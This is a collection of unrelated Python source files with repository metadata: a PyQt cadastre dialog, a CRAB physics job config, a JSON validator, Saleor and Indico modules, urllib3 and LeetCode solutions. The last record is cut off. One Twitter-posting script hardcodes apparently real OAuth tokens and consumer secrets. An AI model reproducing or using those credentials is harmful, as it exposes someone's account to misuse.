c123cb27fbb807acbc4a8bc6148e539dc8c3c3a3
|
/view/Ui_CadastrePageReportDialog.py
|
bf2daf3ef71c709552d9ebe8c80c5b11dea33fb7
|
[] |
no_license
|
ankhbold/lm3_mgis
|
0b1e5498adc3d556b7ea0656ae9fdc02c47fc0f7
|
a2b4fbdcf163662c179922698537ea9150ba16e5
|
refs/heads/master
| 2020-08-06T20:17:49.049160 | 2019-10-08T05:35:05 | 2019-10-08T05:35:05 | 213,139,587 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,886 |
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'D:\work\LAND_MANAGER\lm2\view\CadastrePageReportDialog.ui.'
#
# Created by: PyQt5 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_CadastrePageReportDialog(object):
def setupUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setObjectName(_fromUtf8("CadastrePageReportDialog"))
CadastrePageReportDialog.resize(732, 453)
self.close_button = QtGui.QPushButton(CadastrePageReportDialog)
self.close_button.setGeometry(QtCore.QRect(650, 410, 75, 23))
self.close_button.setObjectName(_fromUtf8("close_button"))
self.find_button = QtGui.QPushButton(CadastrePageReportDialog)
self.find_button.setGeometry(QtCore.QRect(450, 59, 75, 23))
self.find_button.setObjectName(_fromUtf8("find_button"))
self.cpage_twidget = QtGui.QTableWidget(CadastrePageReportDialog)
self.cpage_twidget.setGeometry(QtCore.QRect(10, 110, 718, 292))
self.cpage_twidget.setObjectName(_fromUtf8("cpage_twidget"))
self.cpage_twidget.setColumnCount(7)
self.cpage_twidget.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(3, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(4, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(5, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(6, item)
self.results_label = QtGui.QLabel(CadastrePageReportDialog)
self.results_label.setGeometry(QtCore.QRect(10, 90, 201, 16))
self.results_label.setText(_fromUtf8(""))
self.results_label.setObjectName(_fromUtf8("results_label"))
self.print_button = QtGui.QPushButton(CadastrePageReportDialog)
self.print_button.setGeometry(QtCore.QRect(550, 410, 75, 23))
self.print_button.setObjectName(_fromUtf8("print_button"))
self.line = QtGui.QFrame(CadastrePageReportDialog)
self.line.setGeometry(QtCore.QRect(0, 20, 731, 16))
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.line_2 = QtGui.QFrame(CadastrePageReportDialog)
self.line_2.setGeometry(QtCore.QRect(0, 430, 731, 16))
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.label_2 = QtGui.QLabel(CadastrePageReportDialog)
self.label_2.setGeometry(QtCore.QRect(10, 10, 281, 16))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.print_year_chbox = QtGui.QCheckBox(CadastrePageReportDialog)
self.print_year_chbox.setGeometry(QtCore.QRect(330, 40, 101, 17))
self.print_year_chbox.setObjectName(_fromUtf8("print_year_chbox"))
self.print_year_sbox = QtGui.QSpinBox(CadastrePageReportDialog)
self.print_year_sbox.setEnabled(False)
self.print_year_sbox.setGeometry(QtCore.QRect(330, 59, 91, 22))
self.print_year_sbox.setMinimum(2000)
self.print_year_sbox.setMaximum(2100)
self.print_year_sbox.setProperty("value", 2017)
self.print_year_sbox.setObjectName(_fromUtf8("print_year_sbox"))
self.label_3 = QtGui.QLabel(CadastrePageReportDialog)
self.label_3.setGeometry(QtCore.QRect(10, 40, 171, 16))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.person_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.person_id_edit.setGeometry(QtCore.QRect(10, 60, 150, 20))
self.person_id_edit.setObjectName(_fromUtf8("person_id_edit"))
self.parcel_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.parcel_id_edit.setGeometry(QtCore.QRect(170, 60, 150, 20))
self.parcel_id_edit.setObjectName(_fromUtf8("parcel_id_edit"))
self.label_4 = QtGui.QLabel(CadastrePageReportDialog)
self.label_4.setGeometry(QtCore.QRect(170, 40, 151, 16))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.retranslateUi(CadastrePageReportDialog)
QtCore.QMetaObject.connectSlotsByName(CadastrePageReportDialog)
def retranslateUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setWindowTitle(_translate("CadastrePageReportDialog", "Dialog", None))
self.close_button.setText(_translate("CadastrePageReportDialog", "close", None))
self.find_button.setText(_translate("CadastrePageReportDialog", "Find", None))
item = self.cpage_twidget.horizontalHeaderItem(0)
item.setText(_translate("CadastrePageReportDialog", "ID", None))
item = self.cpage_twidget.horizontalHeaderItem(1)
item.setText(_translate("CadastrePageReportDialog", "PrintDate", None))
item = self.cpage_twidget.horizontalHeaderItem(2)
item.setText(_translate("CadastrePageReportDialog", "Page Number", None))
item = self.cpage_twidget.horizontalHeaderItem(3)
item.setText(_translate("CadastrePageReportDialog", "Person ID", None))
item = self.cpage_twidget.horizontalHeaderItem(4)
item.setText(_translate("CadastrePageReportDialog", "Right Holder", None))
item = self.cpage_twidget.horizontalHeaderItem(5)
item.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
item = self.cpage_twidget.horizontalHeaderItem(6)
item.setText(_translate("CadastrePageReportDialog", "Streetname-Khashaa", None))
self.print_button.setText(_translate("CadastrePageReportDialog", "Print", None))
self.label_2.setText(_translate("CadastrePageReportDialog", "Cadastre page report", None))
self.print_year_chbox.setText(_translate("CadastrePageReportDialog", "Year Print", None))
self.label_3.setText(_translate("CadastrePageReportDialog", "Person ID", None))
self.label_4.setText(_translate("CadastrePageReportDialog", "Parcel ID", None))
|
[
"[email protected]"
] | |
25622946d4cc694e63901dc2980ec2fa9f1ae137
|
57c62abd33f8b508e357ca8631a160ce85a7f340
|
/ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/crab_FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8.py
|
4470aec7aea4019d8df76db06409c83c17dfeaf4
|
[] |
no_license
|
jainshilpi/aNTGC_ggNtuplizer
|
8973ce3cdab293317fd928679b14038f03c10976
|
7153d73fbee35969dad0d85c6517e577a0546566
|
refs/heads/master
| 2022-09-18T07:39:40.246699 | 2020-04-20T13:03:20 | 2020-04-20T13:03:20 | 267,979,045 | 1 | 1 | null | 2020-05-30T00:09:36 | 2020-05-30T00:09:36 | null |
UTF-8
|
Python
| false | false | 2,178 |
py
|
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
import sys
config = config()
#**************************submit function***********************
from CRABAPI.RawCommand import crabCommand
from CRABClient.ClientExceptions import ClientException
from httplib import HTTPException
def submit(config):
try:
crabCommand('submit', config = config)
except HTTPException as hte:
print "Failed submitting task: %s" % (hte.headers)
except ClientException as cle:
print "Failed submitting task: %s" % (cle)
#****************************************************************
workarea='/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/jobs/FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/'
mainOutputDir = '/store/user/mwadud/aNTGC/ggNtuplizerSkim/xSecs/'
config.General.requestName = 'FullXsection_GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8'
config.General.transferLogs = True
config.General.workArea = '%s' % workarea
config.Site.storageSite = 'T2_US_Wisconsin'
config.Site.whitelist = ['T3_US_UCR','T3_US_FNALLPC','T2_US_Purdue','T3_US_Rice','T3_US_Cornell','T3_US_Rutgers','T3_US_FIU','T3_US_FIT','T3_US_PSC','T3_US_OSU','T3_US_TAMU','T3_US_UMD','T3_US_VC3_NotreDame','T3_US_SDSC','T3_US_Colorado','T3_US_OSG','T3_US_Princeton_ICSE','T3_US_NERSC','T3_US_Baylor','T2_US_Nebraska','T2_US_UCSD','T2_US_Wisconsin','T2_US_MIT','T3_US_TACC','T3_US_TTU','T3_US_UMiss']
config.Site.blacklist = ['T2_US_Florida','T2_US_Vanderbilt','T3_US_PuertoRico','T2_US_Caltech']
config.JobType.psetName = '/afs/cern.ch/work/m/mwadud/private/naTGC/CMSSW_9_4_13/src/ggAnalysis/ggNtuplizer/test/crab_submit/XsecAna.py'
config.JobType.pluginName = 'Analysis'
config.Data.inputDataset = '/GJets_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall17MiniAODv2-PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/MINIAODSIM'
config.Data.publication = False
config.Data.allowNonValidInputDataset = True
config.Data.outLFNDirBase = '%s' % mainOutputDir
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 5000
config.Data.ignoreLocality = True
config.Data.totalUnits = 5000
submit(config)
|
[
"[email protected]"
] | |
f806b32b55a9145c4c04c121ccedc5edfff7e060
|
632d7759536ed0726499c2d52c8eb13b5ab213ab
|
/Data/Packages/mdpopups/tests/validate_json_format.py
|
0afbb2d170664281507ba611c0927e38799d1ae9
|
[
"MIT"
] |
permissive
|
Void2403/sublime_text_3_costomize
|
e660ad803eb12b20e9fa7f8eb7c6aad0f2b4d9bc
|
c19977e498bd948fd6d8f55bd48c8d82cbc317c3
|
refs/heads/master
| 2023-08-31T21:32:32.791574 | 2019-05-31T11:46:19 | 2019-05-31T11:46:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,661 |
py
|
"""
Validate JSON format.
Licensed under MIT
Copyright (c) 2012-2015 Isaac Muse <[email protected]>
"""
import re
import codecs
import json
RE_LINE_PRESERVE = re.compile(r"\r?\n", re.MULTILINE)
RE_COMMENT = re.compile(
r'''(?x)
(?P<comments>
/\*[^*]*\*+(?:[^/*][^*]*\*+)*/ # multi-line comments
| [ \t]*//(?:[^\r\n])* # single line comments
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quotes
| .[^/"']* # everything else
)
''',
re.DOTALL
)
RE_TRAILING_COMMA = re.compile(
r'''(?x)
(
(?P<square_comma>
, # trailing comma
(?P<square_ws>[\s\r\n]*) # white space
(?P<square_bracket>\]) # bracket
)
| (?P<curly_comma>
, # trailing comma
(?P<curly_ws>[\s\r\n]*) # white space
(?P<curly_bracket>\}) # bracket
)
)
| (?P<code>
"(?:\\.|[^"\\])*" # double quoted string
| .[^,"']* # everything else
)
''',
re.DOTALL
)
RE_LINE_INDENT_TAB = re.compile(r'^(?:(\t+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_LINE_INDENT_SPACE = re.compile(r'^(?:((?: {4})+)?(?:(/\*)|[^ \t\r\n])[^\r\n]*)?\r?\n$')
RE_TRAILING_SPACES = re.compile(r'^.*?[ \t]+\r?\n?$')
RE_COMMENT_END = re.compile(r'\*/')
PATTERN_COMMENT_INDENT_SPACE = r'^(%s *?[^\t\r\n][^\r\n]*)?\r?\n$'
PATTERN_COMMENT_INDENT_TAB = r'^(%s[ \t]*[^ \t\r\n][^\r\n]*)?\r?\n$'
E_MALFORMED = "E0"
E_COMMENTS = "E1"
E_COMMA = "E2"
W_NL_START = "W1"
W_NL_END = "W2"
W_INDENT = "W3"
W_TRAILING_SPACE = "W4"
W_COMMENT_INDENT = "W5"
VIOLATION_MSG = {
E_MALFORMED: 'JSON content is malformed.',
E_COMMENTS: 'Comments are not part of the JSON spec.',
E_COMMA: 'Dangling comma found.',
W_NL_START: 'Unnecessary newlines at the start of file.',
W_NL_END: 'Missing a new line at the end of the file.',
W_INDENT: 'Indentation Error.',
W_TRAILING_SPACE: 'Trailing whitespace.',
W_COMMENT_INDENT: 'Comment Indentation Error.'
}
class CheckJsonFormat(object):
"""
Test JSON for format irregularities.
- Trailing spaces.
- Inconsistent indentation.
- New lines at end of file.
- Unnecessary newlines at start of file.
- Trailing commas.
- Malformed JSON.
"""
def __init__(self, use_tabs=False, allow_comments=False):
"""Setup the settings."""
self.use_tabs = use_tabs
self.allow_comments = allow_comments
self.fail = False
def index_lines(self, text):
"""Index the char range of each line."""
self.line_range = []
count = 1
last = 0
for m in re.finditer('\n', text):
self.line_range.append((last, m.end(0) - 1, count))
last = m.end(0)
count += 1
def get_line(self, pt):
"""Get the line from char index."""
line = None
for r in self.line_range:
if pt >= r[0] and pt <= r[1]:
line = r[2]
break
return line
def check_comments(self, text):
"""
Check for JavaScript comments.
Log them and strip them out so we can continue.
"""
def remove_comments(group):
return ''.join([x[0] for x in RE_LINE_PRESERVE.findall(group)])
def evaluate(m):
text = ''
g = m.groupdict()
if g["code"] is None:
if not self.allow_comments:
self.log_failure(E_COMMENTS, self.get_line(m.start(0)))
text = remove_comments(g["comments"])
else:
text = g["code"]
return text
content = ''.join(map(lambda m: evaluate(m), RE_COMMENT.finditer(text)))
return content
def check_dangling_commas(self, text):
"""
Check for dangling commas.
Log them and strip them out so we can continue.
"""
def check_comma(g, m, line):
# ,] -> ] or ,} -> }
self.log_failure(E_COMMA, line)
if g["square_comma"] is not None:
return g["square_ws"] + g["square_bracket"]
else:
return g["curly_ws"] + g["curly_bracket"]
def evaluate(m):
g = m.groupdict()
return check_comma(g, m, self.get_line(m.start(0))) if g["code"] is None else g["code"]
return ''.join(map(lambda m: evaluate(m), RE_TRAILING_COMMA.finditer(text)))
def log_failure(self, code, line=None):
"""
Log failure.
Log failure code, line number (if available) and message.
"""
if line:
print("%s: Line %d - %s" % (code, line, VIOLATION_MSG[code]))
else:
print("%s: %s" % (code, VIOLATION_MSG[code]))
self.fail = True
def check_format(self, file_name):
"""Initiate the check."""
self.fail = False
comment_align = None
with codecs.open(file_name, encoding='utf-8') as f:
count = 1
for line in f:
indent_match = (RE_LINE_INDENT_TAB if self.use_tabs else RE_LINE_INDENT_SPACE).match(line)
end_comment = (
(comment_align is not None or (indent_match and indent_match.group(2))) and
RE_COMMENT_END.search(line)
)
# Don't allow empty lines at file start.
if count == 1 and line.strip() == '':
self.log_failure(W_NL_START, count)
# Line must end in new line
if not line.endswith('\n'):
self.log_failure(W_NL_END, count)
# Trailing spaces
if RE_TRAILING_SPACES.match(line):
self.log_failure(W_TRAILING_SPACE, count)
# Handle block comment content indentation
if comment_align is not None:
if comment_align.match(line) is None:
self.log_failure(W_COMMENT_INDENT, count)
if end_comment:
comment_align = None
# Handle general indentation
elif indent_match is None:
self.log_failure(W_INDENT, count)
# Enter into block comment
elif comment_align is None and indent_match.group(2):
alignment = indent_match.group(1) if indent_match.group(1) is not None else ""
if not end_comment:
comment_align = re.compile(
(PATTERN_COMMENT_INDENT_TAB if self.use_tabs else PATTERN_COMMENT_INDENT_SPACE) % alignment
)
count += 1
f.seek(0)
text = f.read()
self.index_lines(text)
text = self.check_comments(text)
self.index_lines(text)
text = self.check_dangling_commas(text)
try:
json.loads(text)
except Exception as e:
self.log_failure(E_MALFORMED)
print(e)
return self.fail
if __name__ == "__main__":
import sys
cjf = CheckJsonFormat(False, True)
cjf.check_format(sys.argv[1])
|
[
"[email protected]"
] | |
e191dcd55943188856e0aa6d20abcb3ae22cd4d2
|
c5698844e4c5cd6428d25f5a97a2f4ad069df251
|
/twitter/publicar desde python/read.py
|
a394d4c896e493b5d9f689dc1751a7b77d468356
|
[] |
no_license
|
jrartd/Python-tools
|
1ade026dcc9b3987bb7a6af130403895a8456d3c
|
361031a2d108e048d267bf386a8a703359a81321
|
refs/heads/master
| 2022-12-21T23:38:53.038535 | 2018-02-09T18:18:10 | 2018-02-09T18:18:10 | 114,409,529 | 0 | 1 | null | 2022-12-12T09:18:07 | 2017-12-15T20:41:15 |
HTML
|
UTF-8
|
Python
| false | false | 458 |
py
|
from twitter import *
access_token = "712533602102284288-QGxqYcFiQlGZGTaoNIgHgq2KZxqZeeH"
access_token_secret = "rlH5ItRHtlguzChQbIvLDo1yYCu47liEtq8fdVgeOZpb9"
consumer_key = "VWe4b0p7vRcVS06gbJyS83dIS"
consumer_secret = "PjkoSJ4YxPXo4V9Uk7bazq4y507e6zBr96q7u2OlJeP1aVZd7w"
texto_tweet = input("Ingrese el texto a twittear")
t = Twitter(auth=OAuth(access_token, access_token_secret, consumer_key, consumer_secret))
t.statuses.update(status= texto_tweet)
|
[
"[email protected]"
] | |
a1590dd5a7d854d633c6cc4a59cd757b06b26e95
|
84c4474a88a59da1e72d86b33b5326003f578271
|
/saleor/graphql/app/mutations/app_retry_install.py
|
64faee9ee45caa39c2e77961854e66c1815f20c1
|
[
"BSD-3-Clause"
] |
permissive
|
vineetb/saleor
|
052bd416d067699db774f06453d942cb36c5a4b7
|
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
|
refs/heads/main
| 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 |
NOASSERTION
| 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null |
UTF-8
|
Python
| false | false | 2,274 |
py
|
import graphene
from django.core.exceptions import ValidationError
from ....app import models
from ....app.error_codes import AppErrorCode
from ....app.tasks import install_app_task
from ....core import JobStatus
from ....permission.enums import AppPermission
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.mutations import ModelMutation
from ...core.types import AppError
from ...core.utils import WebhookEventInfo
from ..types import AppInstallation
class AppRetryInstall(ModelMutation):
class Arguments:
id = graphene.ID(description="ID of failed installation.", required=True)
activate_after_installation = graphene.Boolean(
default_value=True,
required=False,
description="Determine if app will be set active or not.",
)
class Meta:
description = "Retry failed installation of new app."
model = models.AppInstallation
object_type = AppInstallation
permissions = (AppPermission.MANAGE_APPS,)
error_type_class = AppError
error_type_field = "app_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.APP_INSTALLED,
description="An app was installed.",
),
]
@classmethod
def save(cls, _info: ResolveInfo, instance, _cleaned_input, /):
instance.status = JobStatus.PENDING
instance.save()
@classmethod
def clean_instance(cls, _info: ResolveInfo, instance):
if instance.status != JobStatus.FAILED:
msg = "Cannot retry installation with different status than failed."
code = AppErrorCode.INVALID_STATUS.value
raise ValidationError({"id": ValidationError(msg, code=code)})
@classmethod
def perform_mutation(cls, _root, info: ResolveInfo, /, **data):
activate_after_installation = data.get("activate_after_installation")
app_installation = cls.get_instance(info, **data)
cls.clean_instance(info, app_installation)
cls.save(info, app_installation, None)
install_app_task.delay(app_installation.pk, activate_after_installation)
return cls.success_response(app_installation)
|
[
"[email protected]"
] | |
0573b6563ad45c09808049f4fdd2f87ff082fce9
|
ba157236151a65e3e1fde2db78b0c7db81b5d3f6
|
/String/longest_group_positions.py
|
f01ef3284224992f2d915fed2ff79a7296bfda75
|
[] |
no_license
|
JaberKhanjk/LeetCode
|
152488ccf385b449d2a97d20b33728483029f85b
|
78368ea4c8dd8efc92e3db775b249a2f8758dd55
|
refs/heads/master
| 2023-02-08T20:03:34.704602 | 2020-12-26T06:24:33 | 2020-12-26T06:24:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 372 |
py
|
class Solution(object):
def largeGroupPositions(self, s):
ans = []
i = 0
for j in range(len(s)):
if j == len(s) - 1 or s[j] != s[j+1]:
if j-i+1 >= 3:
ans.append([i,j])
i = j+1
return ans
"""
:type s: str
:rtype: List[List[int]]
"""
|
[
"[email protected]"
] | |
2a947f6dde626fc5c7a608db41b0b51fbd6eafdb
|
8d5ba6747531cbd43d63d32265fd608f9081c3b7
|
/.venv/lib/python2.7/site-packages/indico/core/db/sqlalchemy/custom/unaccent.py
|
b4838177828f13481121fa0984a94d46e9307b19
|
[] |
no_license
|
Collinsnyamao/indico
|
0e433b78803afae5b1ac90483db1f3d90ce2fddb
|
32adf8123e266eb81439b654abc993b98e0cd7f2
|
refs/heads/master
| 2020-03-18T04:55:40.386595 | 2018-06-02T13:45:47 | 2018-06-02T13:45:47 | 134,314,163 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,436 |
py
|
# This file is part of Indico.
# Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from sqlalchemy import DDL, Index, text
from sqlalchemy.event import listens_for
from sqlalchemy.sql import func
from sqlalchemy.sql.elements import conv
from indico.util.string import to_unicode
# if you wonder why search_path is set and the two-argument `unaccent` function is used,
# see this post on stackoverflow: http://stackoverflow.com/a/11007216/298479
SQL_FUNCTION_UNACCENT = '''
CREATE FUNCTION indico.indico_unaccent(value TEXT)
RETURNS TEXT
AS $$
BEGIN
RETURN unaccent('unaccent', value);
END;
$$
LANGUAGE plpgsql IMMUTABLE SET search_path = public, pg_temp;
'''
def _should_create_function(ddl, target, connection, **kw):
sql = "SELECT COUNT(*) FROM information_schema.routines WHERE routine_name = 'indico_unaccent'"
count = connection.execute(text(sql)).scalar()
return not count
def create_unaccent_function(conn):
"""Creates the unaccent function if it doesn't exist yet.
In TESTING mode it always uses the no-op version to have a
consistent database setup.
"""
DDL(SQL_FUNCTION_UNACCENT).execute_if(callable_=_should_create_function).execute(conn)
def define_unaccented_lowercase_index(column):
"""Defines an index that uses the indico_unaccent function.
Since this is usually used for searching, the column's value is
also converted to lowercase before being unaccented. To make proper
use of this index, use this criterion when querying the table::
db.func.indico.indico_unaccent(db.func.lower(column)).ilike(...)
The index will use the trgm operators which allow very efficient LIKE
even when searching e.g. ``LIKE '%something%'``.
:param column: The column the index should be created on, e.g.
``User.first_name``
"""
@listens_for(column.table, 'after_create')
def _after_create(target, conn, **kw):
assert target is column.table
col_func = func.indico.indico_unaccent(func.lower(column))
index_kwargs = {'postgresql_using': 'gin',
'postgresql_ops': {col_func.key: 'gin_trgm_ops'}}
Index(conv('ix_{}_{}_unaccent'.format(column.table.name, column.name)), col_func, **index_kwargs).create(conn)
def unaccent_match(column, value, exact):
from indico.core.db import db
value = to_unicode(value).replace('%', r'\%').replace('_', r'\_').lower()
if not exact:
value = '%{}%'.format(value)
# we always use LIKE, even for an exact match. when using the pg_trgm indexes this is
# actually faster than `=`
return db.func.indico.indico_unaccent(db.func.lower(column)).ilike(db.func.indico.indico_unaccent(value))
|
[
"[email protected]"
] | |
6371e03f7e86aed6d39e751ba81d7471c80155ef
|
7d2f933ed3c54e128ecaec3a771817c4260a8458
|
/venv/Lib/site-packages/requests/packages/urllib3/__init__.py
|
f669e1f517d93579a48a00c7ca81b40ac6d206c5
|
[] |
no_license
|
danielmoreira12/BAProject
|
c61dfb1d0521eb5a28eef9531a00e744bfb0e26a
|
859f588305d826a35cc8f7d64c432f54a0a2e031
|
refs/heads/master
| 2021-01-02T07:17:39.267278 | 2020-02-25T22:27:43 | 2020-02-25T22:27:43 | 239,541,177 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,700 |
py
|
# urllib3/__init__.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
urllib3 - Thread-safe connection pooling and re-using.
"""
__author__ = 'Andrey Petrov ([email protected])'
__license__ = 'MIT'
__version__ = 'dev'
# Set default logging handler to avoid "No handler found" warnings.
import logging
from . import exceptions
from .connectionpool import (
HTTPConnectionPool,
HTTPSConnectionPool,
connection_from_url
)
from .filepost import encode_multipart_formdata
from .poolmanager import PoolManager, ProxyManager, proxy_from_url
from .response import HTTPResponse
from .util import make_headers, get_host, Timeout
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
def add_stderr_logger(level=logging.DEBUG):
"""
Helper for quickly adding a StreamHandler to the logger. Useful for
debugging.
Returns the handler after adding it.
"""
# This method needs to be in this __init__.py to get the __name__ correct
# even if urllib3 is vendored within another package.
logger = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))
logger.addHandler(handler)
logger.setLevel(level)
logger.debug('Added an stderr logging handler to logger: %s' % __name__)
return handler
# ... Clean up.
del NullHandler
|
[
"[email protected]"
] | |
f48b6acd7862cead47ba1fafc6a3ebd6557b73be
|
303bac96502e5b1666c05afd6c2e85cf33f19d8c
|
/solutions/python3/993.py
|
d918d769447829914b6898f916ac2d314071b6a7
|
[
"MIT"
] |
permissive
|
jxhangithub/leetcode
|
5e82f4aeee1bf201e93e889e5c4ded2fcda90437
|
0de1af607557d95856f0e4c2a12a56c8c57d731d
|
refs/heads/master
| 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 |
MIT
| 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null |
UTF-8
|
Python
| false | false | 430 |
py
|
class Solution:
def isCousins(self, root: TreeNode, x: int, y: int) -> bool:
def dfs(node, parent, depth, mod):
if node:
if node.val == mod:
return depth, parent
return dfs(node.left, node, depth + 1, mod) or dfs(node.right, node, depth + 1, mod)
dx, px, dy, py = dfs(root, None, 0, x) + dfs(root, None, 0, y)
return dx == dy and px != py
|
[
"[email protected]"
] | |
869d4de40b4774adacf3db6705df1c3d7a5ab419
|
cb2411c5e770bcdd07b170c2bc07f5e0cc72fc86
|
/Greedy/55. Jump Game.py
|
6ad22c17c7c535c3c1f269e0caf4426d60a13b2f
|
[] |
no_license
|
roy355068/Algo
|
f79cf51662832e33664fc1d2479f79405d586e2e
|
14febbb5d8504438ef143678dedc89d4b61b07c9
|
refs/heads/master
| 2021-05-11T04:32:11.434762 | 2018-01-30T00:01:26 | 2018-01-30T00:01:26 | 117,941,600 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,905 |
py
|
# Given an array of non-negative integers, you are initially positioned at the first index of the array.
# Each element in the array represents your maximum jump length at that position.
# Determine if you are able to reach the last index.
# For example:
# A = [2,3,1,1,4], return true.
# A = [3,2,1,0,4], return false.
# Idea is that use a maximumReach variable to track the max range of the array can reach
# if i > m, indicated that i is not reachable by previous element and jumping
# so end the program earlier and return False, else if maximumReach >= the index of
# last element, meaning that the last element is reachable, return True
class Solution(object):
def canJump(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
# O(N ^ 2) time, O(N) space complexity
if not nums or len(nums) == 1:
return True
# jump array is a dp array that used to check if the index is reachable
jump = [False for _ in xrange(len(nums))]
jump[0] = True
for i in xrange(len(nums)):
step = nums[i]
j = i + 1
# jump[i] == True means that this index is reachable based
# on the jump steps before it
if jump[i] == True:
# update all indices that is reachable from current stand point
while j <= len(nums) - 1 and j < i + step + 1:
jump[j] = True
j += 1
return jump[-1]
# Optimized, O(N) time, O(1) space complexity
i, reachable = 0, 0
# if i exceeds reachable, meaning that current index is never going
# to be reachable by jumping from previous indices
# hence stop the loop earlier
while i < len(nums) and i <= reachable:
reachable = max(reachable, i + nums[i])
i += 1
return i == len(nums)
|
[
"[email protected]"
] | |
add36c49f08156fa9f65d5e079441f0e3c7f56f7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03168/s086851558.py
|
7143c7be26364089fb75fade50516b0a34c2696e
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 511 |
py
|
import sys
def input(): return sys.stdin.readline().rstrip()
def main():
n=int(input())
P=list(map(float,input().split()))
dp=[[0]*(n+1) for _ in range(n)]#コインi(0-)までで,j枚が表
dp[0][0]=1-P[0]
dp[0][1]=P[0]
for i in range(1,n):
for j in range(i+2):
if j==0:
dp[i][j]=dp[i-1][j]*(1-P[i])
else:
dp[i][j]=dp[i-1][j-1]*P[i]+dp[i-1][j]*(1-P[i])
print(sum(dp[-1][n//2+1:]))
if __name__=='__main__':
main()
|
[
"[email protected]"
] | |
7d442a07bfb8f720507da67a316b7bfbddefbabe
|
e29b450bf924b983023db41a0cdea97cde129880
|
/reversible/sinkhorn.py
|
da994a5c781f3dbf5244c34a45a3d33e8ec14a12
|
[] |
no_license
|
afcarl/generative-reversible
|
b9efedad155d9c08f0f299f0b861ff6ff53607cf
|
e21b0846c654e0e041562f715bc5ddd90dde0e07
|
refs/heads/master
